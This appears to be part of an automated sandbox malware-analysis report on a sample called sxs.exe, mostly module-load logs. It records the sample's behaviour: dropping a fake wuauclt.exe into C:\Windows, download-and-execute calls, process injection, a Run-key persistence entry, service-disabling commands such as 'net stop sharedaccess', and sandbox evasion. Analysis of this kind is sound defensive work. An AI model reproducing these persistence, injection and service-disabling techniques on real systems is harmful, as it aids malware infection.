Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ninput.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: actxprxy.dll
Source: C:\Windows\SysWOW64\regedit.exeSection loaded: authz.dll
Source: C:\Windows\SysWOW64\regedit.exeSection loaded: aclui.dll
Source: C:\Windows\SysWOW64\regedit.exeSection loaded: ulib.dll
Source: C:\Windows\SysWOW64\regedit.exeSection loaded: clb.dll
Source: C:\Windows\SysWOW64\regedit.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regedit.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\regedit.exeSection loaded: xmllite.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
Source: C:\Windows\explorer.exeSection loaded: aepic.dll
Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
Source: C:\Windows\explorer.exeSection loaded: userenv.dll
Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: propsys.dll
Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
Source: C:\Windows\explorer.exeSection loaded: wininet.dll
Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
Source: C:\Windows\explorer.exeSection loaded: wldp.dll
Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
Source: C:\Windows\explorer.exeSection loaded: netutils.dll
Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
Source: C:\Windows\explorer.exeSection loaded: ninput.dll
Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
Source: C:\Windows\explorer.exeSection loaded: actxprxy.dll
Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exeSection loaded: ieframe.dll
Source: C:\Windows\explorer.exeSection loaded: netapi32.dll
Source: C:\Windows\explorer.exeSection loaded: version.dll
Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
Source: C:\Windows\explorer.exeSection loaded: wkscli.dll
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exeSection loaded: edputil.dll
Source: C:\Windows\explorer.exeSection loaded: secur32.dll
Source: C:\Windows\explorer.exeSection loaded: mlang.dll
Source: C:\Windows\explorer.exeSection loaded: profapi.dll
Source: C:\Windows\explorer.exeSection loaded: policymanager.dll
Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exeSection loaded: wintypes.dll
Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exeSection loaded: pcacli.dll
Source: C:\Windows\explorer.exeSection loaded: mpr.dll
Source: C:\Windows\explorer.exeSection loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
Source: C:\Windows\wuauclt.exeSection loaded: wininet.dll
Source: C:\Windows\wuauclt.exeSection loaded: urlmon.dll
Source: C:\Windows\wuauclt.exeSection loaded: iertutil.dll
Source: C:\Windows\wuauclt.exeSection loaded: srvcli.dll
Source: C:\Windows\wuauclt.exeSection loaded: netutils.dll
Source: C:\Windows\wuauclt.exeSection loaded: apphelp.dll
Source: C:\Windows\wuauclt.exeSection loaded: sspicli.dll
Source: C:\Windows\wuauclt.exeSection loaded: windows.storage.dll
Source: C:\Windows\wuauclt.exeSection loaded: wldp.dll
Source: C:\Windows\wuauclt.exeSection loaded: profapi.dll
Source: C:\Windows\wuauclt.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\wuauclt.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\wuauclt.exeSection loaded: winhttp.dll
Source: C:\Windows\wuauclt.exeSection loaded: iphlpapi.dll
Source: C:\Windows\wuauclt.exeSection loaded: mswsock.dll
Source: C:\Windows\wuauclt.exeSection loaded: winnsi.dll
Source: C:\Windows\wuauclt.exeSection loaded: uxtheme.dll
Source: C:\Windows\wuauclt.exeSection loaded: dnsapi.dll
Source: C:\Windows\wuauclt.exeSection loaded: rasadhlp.dll
Source: C:\Windows\wuauclt.exeSection loaded: textshaping.dll
Source: C:\Windows\wuauclt.exeSection loaded: textinputframework.dll
Source: C:\Windows\wuauclt.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\wuauclt.exeSection loaded: coremessaging.dll
Source: C:\Windows\wuauclt.exeSection loaded: ntmarta.dll
Source: C:\Windows\wuauclt.exeSection loaded: coremessaging.dll
Source: C:\Windows\wuauclt.exeSection loaded: wintypes.dll
Source: C:\Windows\wuauclt.exeSection loaded: wintypes.dll
Source: C:\Windows\wuauclt.exeSection loaded: wintypes.dll
Source: C:\Windows\wuauclt.exeSection loaded: propsys.dll
Source: C:\Windows\wuauclt.exeSection loaded: edputil.dll
Source: C:\Windows\wuauclt.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\wuauclt.exeSection loaded: appresolver.dll
Source: C:\Windows\wuauclt.exeSection loaded: bcp47langs.dll
Source: C:\Windows\wuauclt.exeSection loaded: slc.dll
Source: C:\Windows\wuauclt.exeSection loaded: userenv.dll
Source: C:\Windows\wuauclt.exeSection loaded: sppc.dll
Source: C:\Windows\wuauclt.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\wuauclt.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exeSection loaded: aepic.dll
Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
Source: C:\Windows\explorer.exeSection loaded: userenv.dll
Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: propsys.dll
Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
Source: C:\Windows\explorer.exeSection loaded: wininet.dll
Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
Source: C:\Windows\explorer.exeSection loaded: wldp.dll
Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
Source: C:\Windows\explorer.exeSection loaded: netutils.dll
Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
Source: C:\Windows\explorer.exeSection loaded: ninput.dll
Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
Source: C:\Windows\explorer.exeSection loaded: actxprxy.dll
Source: C:\Windows\explorer.exeSection loaded: aepic.dll
Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
Source: C:\Windows\explorer.exeSection loaded: userenv.dll
Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: propsys.dll
Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
Source: C:\Windows\explorer.exeSection loaded: wininet.dll
Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exeSection loaded: wldp.dll
Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
Source: C:\Windows\explorer.exeSection loaded: netutils.dll
Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
Source: C:\Windows\explorer.exeSection loaded: ninput.dll
Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
Source: C:\Windows\explorer.exeSection loaded: actxprxy.dll
Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exeSection loaded: ieframe.dll
Source: C:\Windows\explorer.exeSection loaded: netapi32.dll
Source: C:\Windows\explorer.exeSection loaded: version.dll
Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
Source: C:\Windows\explorer.exeSection loaded: wkscli.dll
Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exeSection loaded: edputil.dll
Source: C:\Windows\explorer.exeSection loaded: secur32.dll
Source: C:\Windows\explorer.exeSection loaded: mlang.dll
Source: C:\Windows\explorer.exeSection loaded: profapi.dll
Source: C:\Windows\explorer.exeSection loaded: policymanager.dll
Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exeSection loaded: wintypes.dll
Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exeSection loaded: pcacli.dll
Source: C:\Windows\explorer.exeSection loaded: mpr.dll
Source: C:\Windows\explorer.exeSection loaded: sfc_os.dll
Source: C:\Users\user\Desktop\sxs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Google Drive.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_3_00741BC1 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAlloc,CloseHandle,VirtualFree,EnumProcesses,OpenProcess,EnumProcessModules,OpenProcess,CreateProcessA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualFreeEx,CloseHandle,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,WriteProcessMemory,ResumeThread,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,WaitForSingleObject,CreateRemoteThread,SetThreadPriority,WaitForSingleObject,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_3_00741BC1
Source: initial sampleStatic PE information: section where entry point is pointing to: es2z1
Source: sxs.exeStatic PE information: section name: es2z0
Source: sxs.exeStatic PE information: section name: es2z1
Source: sxs.exeStatic PE information: section name: es2z2
Source: wuauclt.exe.0.drStatic PE information: section name: es2z0
Source: wuauclt.exe.0.drStatic PE information: section name: es2z1
Source: wuauclt.exe.0.drStatic PE information: section name: es2z2
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_3_00741C0A push 90909090h; ret 0_3_00741C19
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00404024 push 00404075h; ret 0_2_0040406D
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004068D0 push ecx; mov dword ptr [esp], 00000007h0_2_004068D1
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00408494 push ecx; mov dword ptr [esp], 00000007h0_2_00408495
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0040481C push 00404848h; ret 0_2_00404840
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00404022 push 00404075h; ret 0_2_0040406D
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004068F0 push 0040691Ch; ret 0_2_00406914
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004051C8 push 004052A8h; ret 0_2_004052A0
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004051CC push 004052A8h; ret 0_2_004052A0
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043C9EE push ebx; mov dword ptr [esp], 41912273h0_2_0043CA0C
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043C9EE push ecx; mov dword ptr [esp], eax0_2_0043CA60
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004041F4 push 00404220h; ret 0_2_00404218
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043C9F4 push ebx; mov dword ptr [esp], 41912273h0_2_0043CA0C
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043C9F4 push ecx; mov dword ptr [esp], eax0_2_0043CA60
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043A99B push eax; ret 0_2_0043A99C
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043C1B1 push ecx; mov dword ptr [esp], eax0_2_0043C1EA
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00439A74 push esi; ret 0_2_00439A80
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00439A26 push esi; ret 0_2_00439A80
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0040422C push 00404258h; ret 0_2_00404250
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043AACF push AA6B2F6Ah; rep ret 0_2_0043AAD4
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004052F2 push 00405320h; ret 0_2_00405318
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004052F4 push 00405320h; ret 0_2_00405318
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004052B4 push 004052E0h; ret 0_2_004052D8
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00405364 push 00405390h; ret 0_2_00405388
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00408B1C push 00408B42h; ret 0_2_00408B3A
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0040532C push 00405358h; ret 0_2_00405350
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043CBFC push edi; mov dword ptr [esp], edx0_2_0043CC3C
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004053AA push 004053D8h; ret 0_2_004053D0
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004053AC push 004053D8h; ret 0_2_004053D0
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00404448 push 00404474h; ret 0_2_0040446C
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_0043CC1B push edi; mov dword ptr [esp], edx0_2_0043CC3C
Source: sxs.exeStatic PE information: section name: es2z1 entropy: 7.783668165941755
Source: wuauclt.exe.0.drStatic PE information: section name: es2z1 entropy: 7.783668165941755

Persistence and Installation Behavior

barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\sxs.exeExecutable created and started: C:\Windows\wuauclt.exeJump to behavior
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00407BEC URLDownloadToFileA,Sleep,CopyFileA,Sleep,ShellExecuteA,0_2_00407BEC
Source: C:\Users\user\Desktop\sxs.exeFile created: C:\Windows\wuauclt.exeJump to dropped file
Source: C:\Users\user\Desktop\sxs.exeFile created: C:\Windows\wuauclt.exeJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop sharedaccess
Source: C:\Users\user\Desktop\sxs.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run MicrosoftJump to behavior
Source: C:\Users\user\Desktop\sxs.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run MicrosoftJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config KVWSC start= disabled
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_3_00741BC1 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAlloc,CloseHandle,VirtualFree,EnumProcesses,OpenProcess,EnumProcessModules,OpenProcess,CreateProcessA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualFreeEx,CloseHandle,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,WriteProcessMemory,ResumeThread,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,WaitForSingleObject,CreateRemoteThread,SetThreadPriority,WaitForSingleObject,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_3_00741BC1
Source: C:\Users\user\Desktop\sxs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\sxs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\sxs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\sxs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\sxs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\wuauclt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regedit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\wuauclt.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\Desktop\sxs.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-5484
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
